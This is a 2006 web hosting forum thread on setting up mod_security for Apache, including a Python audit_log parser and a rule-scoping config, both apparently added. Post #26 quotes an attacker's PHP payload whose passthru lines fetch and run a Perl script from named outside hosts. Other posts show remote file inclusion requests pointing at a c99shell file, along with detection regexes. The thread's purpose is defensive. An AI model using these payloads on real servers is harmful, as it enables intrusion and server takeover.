  1. #26
    Join Date
    May 2003
    Location
    Florida
    Posts
    902
    Quote Originally Posted by The Blind Can See
    Thanks for the responses.

    Here is what I did.

    I added "include.." in httpd.conf and created their respective files

    I added eth0's set, plus rules.conf and rootkits.conf from gotroot
    http://www.gotroot.com/downloads/ftp/mod_security/


    Does this look ok?
    Looks like it is working already. The second one (serverPath=http://trendpresent.de/images/root.txt) appears to be trying to gain access to the server. Here is what it is trying to do:
    Code:
    <?
     passthru('cd /tmp;wget http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
     passthru('cd /tmp;lynx -source ttp://trendpresent.de/sh >sh;perl sh;rm -f *');
     passthru('cd /tmp;fetch ttp://trendpresent.de/sht >sh;perl sh;rm -f *');
     passthru('cd /tmp;GET ttp://trendpresent.de/sh >sh;perl sh;rm -f *');
    
     passthru('cd /dev/shm;wget http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /dev/shm;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /dev/shm;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
     passthru('cd /dev/shm;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /dev/shm;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /dev/shm;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
    
     passthru('cd /var/tmp;wget http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /var/tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /var/tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
     passthru('cd /var/tmp;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /var/tmp;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /var/tmp;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     ?>
    I suggest you consider disabling some functions in php.ini (like passthru) unless you really need them on.

  2. #27
    Thanks for the info...here's a question...where did you get these logs from? I didn't post that

  3. #28
    Here is more...


    One is for my forum; it gives a 403 when attempting to save an updated vBulletin template.
    Last edited by The Blind Can See; 09-10-2006 at 02:57 PM.

  4. #29
    Join Date
    May 2003
    Location
    Florida
    Posts
    902
    Quote Originally Posted by The Blind Can See
    Thanks for the info...here's a question...where did you get these logs from? I didn't post that
    Actually I got it from your post where you gave what was in the audit_log. Your second entry was:
    ==23bb7470==============================
    Request: www.hosteddomain.com 70.87.119.68 - - [10/Sep/2006:13:12:32 -0500] "GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1" 403 437 "-" "libwww-perl/5.805" - "-"
    ----------------------------------------
    GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1
    Connection: TE, close
    Host: www.hosteddomain.com
    TE: deflate,gzip;q=0.3
    User-Agent: libwww-perl/5.805
    mod_security-action: 403
    mod_security-message: Access denied with code 403. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"][rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"]
    I looked at the line at the top that starts with "GET". If you check, it shows the link that was being called. It was: serverPath=http://trendpresent.de/images/root.txt

    If you check that link, it is what I posted.

  5. #30
    Join Date
    May 2003
    Location
    Florida
    Posts
    902
    Quote Originally Posted by The Blind Can See
    Here is more...


    One is for my forum; it gives a 403 when attempting to save an updated vBulletin template.
    Your server is pretty busy protecting you. Good thing you have mod_security installed. Here is another hacker trying to get in - that was stopped:
    GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sylviawebster.f2s.com/mmf/extWiki//htdocs/files/c99shell_r16.txt

    I imagine the rule stopping your update is the one with alter|create|drop in it. You can either turn that rule off, allow it for your site only, or turn it off only when you need to update the theme.

  6. #31
    Thanks..... that is the same line that gave me the 403 on my site

    Code:
    #Generic SQL sigs
    SecFilterSelective ARGS "((alter|create|drop)[[:space:]]+(column|database|procedure|table)|delete[[:space:]]+from|update.+set.+=)" "id:300015,rev:1,severity:2,msg:'Generic SQL injection protection'"
    How do I disable it for one site?

  7. #32
    By the way, anyone have a remedy for losers who have nothing better to do than to attempt to hack others all day long?


  8. #33
    Join Date
    May 2003
    Location
    Florida
    Posts
    902
    Quote Originally Posted by The Blind Can See
    By the way, anyone have a remedy for losers who have nothing better to do than to attempt to hack others all day long?

    Not really much you can do. One thing I have seen done is to change the line:
    SecFilterDefaultAction "deny,log,status:403"

    To something like:
    SecFilterDefaultAction "deny,log,redirect:http://www.google.com"

    This would redirect them to Google instead of your site. I guess you could also direct them to somebody better. Won't stop them.


    It would be good if somebody would write a mod_security rule that adds them to the firewall deny.
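Post #29 shows how to read an audit_log entry by hand (the "Request:" line, the GET line, and the mod_security-message with its rule id), and post #33 wishes for something that acts on repeat offenders. The following is an added example, not code from the thread or from mod_security itself: a small Python parser for the mod_security 1.x audit_log format that pulls out client, request, rule id and message, flags any query parameter whose value is a remote URL (the remote-file-inclusion pattern the thread is looking at), and counts 403s per client so a defender can decide what deserves a firewall entry rather than blocking on a single hit. The sample log is constructed: the first entry is the one quoted in post #29, the second reuses post #30's request line with the same client IP assumed, and the third is an ordinary allowed request.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in mod_security 1.x audit_log layout. Entry 1 is the one
# quoted in the thread; entry 2 reuses the request from post #30 and assumes
# the same client; entry 3 is a benign request added for contrast.
SAMPLE_AUDIT_LOG = r'''==23bb7470==============================
Request: www.hosteddomain.com 70.87.119.68 - - [10/Sep/2006:13:12:32 -0500] "GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1" 403 437 "-" "libwww-perl/5.805" - "-"
----------------------------------------
GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1
Host: www.hosteddomain.com
User-Agent: libwww-perl/5.805
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"][rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"]
==23bb7471==============================
Request: www.hosteddomain.com 70.87.119.68 - - [10/Sep/2006:13:15:02 -0500] "GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sylviawebster.f2s.com/mmf/extWiki//htdocs/files/c99shell_r16.txt HTTP/1.1" 403 437 "-" "libwww-perl/5.805" - "-"
----------------------------------------
GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sylviawebster.f2s.com/mmf/extWiki//htdocs/files/c99shell_r16.txt HTTP/1.1
Host: www.hosteddomain.com
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"][rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"]
==23bb7472==============================
Request: www.hosteddomain.com 192.0.2.10 - - [10/Sep/2006:13:20:45 -0500] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0" - "-"
----------------------------------------
GET /forum/index.php HTTP/1.1
Host: www.hosteddomain.com
'''

# Entries are separated by "==<hex id>=====" lines.
ENTRY_SEP = re.compile(r"^==[0-9a-f]+=+$", re.M)
# "Request: host client ident user [time] "request line" status bytes ..."
REQUEST_LINE = re.compile(
    r'^Request: (?P<host>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)', re.M)
# Rule metadata inside the mod_security-message: [id "300018"] [msg "..."] ...
TAG = re.compile(r'\[(\w+) "([^"]*)"\]')
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.I)


def remote_url_params(request_line):
    """Return (name, value) pairs from the query string whose value is a URL."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_SCHEME.match(v)]


def parse_audit_log(text):
    """Split an audit_log into entries and extract the fields worth triaging."""
    entries = []
    for chunk in ENTRY_SEP.split(text):
        m = REQUEST_LINE.search(chunk)
        if not m:
            continue  # leading empty chunk or a truncated entry
        rec = m.groupdict()
        rec["status"] = int(rec["status"])
        rec["rule_id"] = rec["msg"] = rec["severity"] = None
        msg_line = re.search(r"^mod_security-message: (.*)$", chunk, re.M)
        if msg_line:
            tags = dict(TAG.findall(msg_line.group(1)))
            rec["rule_id"] = tags.get("id")
            rec["msg"] = tags.get("msg")
            rec["severity"] = tags.get("severity")
        rec["remote_params"] = remote_url_params(rec["request"])
        entries.append(rec)
    return entries


def denials_by_client(entries, status=403):
    """Count denied requests per client IP, the input for any blocking decision."""
    counts = {}
    for rec in entries:
        if rec["status"] == status:
            counts[rec["client"]] = counts.get(rec["client"], 0) + 1
    return counts


if __name__ == "__main__":
    parsed = parse_audit_log(SAMPLE_AUDIT_LOG)
    for rec in parsed:
        print(rec["client"], rec["status"], rec["rule_id"], rec["remote_params"])
    print(denials_by_client(parsed))
```

Run against the real file the output of the last line is the per-IP tally; a threshold over a time window, not a single 403, is the sensible trigger for a firewall rule, since a rule like 300015 also fires on legitimate admin traffic as post #31 found.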

  9. #34
    Join Date
    May 2003
    Location
    behind your business
    Posts
    70
    Quote Originally Posted by The Blind Can See
    Thanks..... that is the same line that gave me the 403 in my site

    Code:
    #Generic SQL sigs
    SecFilterSelective ARGS "((alter|create|drop)[[:space:]]+(column|database|procedure|table)|delete[[:space:]]+from|update.+set.+=)" "id:300015,rev:1,severity:2,msg:'Generic SQL injection protection'"
    how do I disable it for one site?
    Add this in httpd.conf under his VirtualHost:

    <VirtualHost IP:80>
    .
    .
    SecFilterRemove 300015
    .
    </VirtualHost>

    -asc2000-

  10. #35
    I'll try that..here's another problem. Cannot publish through frontpage (oddly, it worked a few times and suddenly stopped, AFTER the rules were already applied)

    Apache log:

    [Sun Sep 10 21:02:57 2006] [error] [client xx.xx.xx] mod_security: Access denied with code 403. Pattern match "(((URL|SRC|HREF|LOWSRC)[\\\\s]*=)|(url[\\\\s]*[\\\\(]))[\\\\s]*[\\\\'\\"]*[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*j[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*a[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*v[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*a[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*s[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*c[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*r[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*i[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*p[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*t[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*[\\\\:]" at POST_PAYLOAD [hostname "mydomain.com"] [uri "/_vti_bin/_vti_aut/author.exe"]

    I removed these two from modsec.conf:

    SecFilterSelective POST_PAYLOAD "cc:"
    SecFilterSelective POST_PAYLOAD "cc:\x20"

    Still doesn't publish (403 error)

    I even added this:

    ###########################################
    #Front page exclusions
    ###########################################
    < LocationMatch "/_vti_bin/_vti_aut/author.exe" >
    SecFilterInheritance Off
    < /LocationMatch >

    That caused Apache to fail.

  11. #36
    The line causing the 403 is

    Code:
    SecFilter "(((URL|SRC|HREF|LOWSRC)[\s]*=)|(url[\s]*[\(]))[\s]*[\'\"]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:]"
    I would like to keep it there and add some sort of frontpage exception that will work. Please help
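Posts #34 and #35 both come down to scoping mod_security rules to one site or one path. The configuration below is an added example, not from the thread, and assumes mod_security 1.9.x semantics: SecFilterRemove drops a rule by the id given in its "id:" action, and SecFilterInheritance Off stops a container from inheriting the filters defined above it. The IP address, hostnames and paths are placeholders. The javascript: SecFilter quoted in post #36 has no id, so it cannot be removed with SecFilterRemove; the LocationMatch container handles that by not inheriting any filters for the FrontPage author.exe path and, as a compensating control, restricting who may reach that path at all.

```apache
# Global rules stay in modsec.conf as before (rule 300015 and the
# unnamed "javascript:" SecFilter among them). Only the exceptions live here.

<VirtualHost 192.0.2.1:80>
    ServerName forum.example.com
    DocumentRoot /var/www/forum

    # Per-site fix from post #34: drop only rule 300015 for this site, so a
    # vBulletin template containing ALTER/CREATE/DROP can be saved.
    SecFilterRemove 300015
</VirtualHost>

<VirtualHost 192.0.2.1:80>
    ServerName www.example.com
    DocumentRoot /var/www/html

    # Note "<LocationMatch", with no space after "<". A line such as
    # "< LocationMatch ... >" is not a valid container opener and makes
    # httpd refuse to start, which matches what post #35 saw.
    <LocationMatch "^/_vti_bin/_vti_aut/author\.exe$">
        # Do not inherit the global filters for this one path; with no
        # filters defined inside the container, the FrontPage POST passes.
        SecFilterInheritance Off

        # Because filtering is off here, limit the path to the network the
        # publishing client uses (placeholder range; Apache 2.0/2.2 syntax).
        Order deny,allow
        Deny from all
        Allow from 203.0.113.0/24
    </LocationMatch>
</VirtualHost>
```

After editing, `apachectl configtest` reports any container syntax problem before a restart takes the site down, and the mod_security audit_log for the author.exe path should show no further 403 entries from the publishing client.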
